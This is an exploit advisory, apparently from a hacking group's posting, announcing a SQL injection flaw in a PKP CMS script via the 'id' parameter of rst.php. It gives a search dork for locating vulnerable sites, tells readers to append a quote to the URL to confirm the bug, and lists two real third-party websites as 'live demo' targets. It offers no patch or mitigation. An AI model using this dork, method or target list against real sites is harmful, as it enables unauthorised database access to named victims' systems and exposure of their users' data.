
pkp CMS SQL Injection Vulnerability

Author: Dead.Zone, Published: 25-01-2013
   010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010

############################################################################
# Exploit Title: pkp CMS SQL Injection Vulnerability #
# Date: 01/24/2013 #
# Author: Dead.Zone #
# Vendor Link: http://pkp.sfu.ca/ #
# Version : N/A #
# Platform / Tested on: php/linux #
# Dork: inurl:rst.php?id=20 & intext:developed by The Public Knowledge Project #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org #
############################################################################

You can append this string (') to the website URL to find the SQL injection bug :)

Example:
http://[PATH]/rst.php?id=[SQL]


Live demo :

http://www.sbpjor.org.br/ojs/rst/rst.php?op=view_metadata&id=20
http://www.amid.dk/ocs/rst.php?id=20&op=show_meta&cf=1

Good Luck


############################################################################################
# #
# We Are: H-SK33PY | Immortal Boy | Dead.Zone| Noter | Neda | M0ri , Rez0us^N!hasa , Agrab #
# #
# And All Iranian DataCoders Members #
# #
# Don't Forget WwW.DataCoders.Org #
############################################################################################
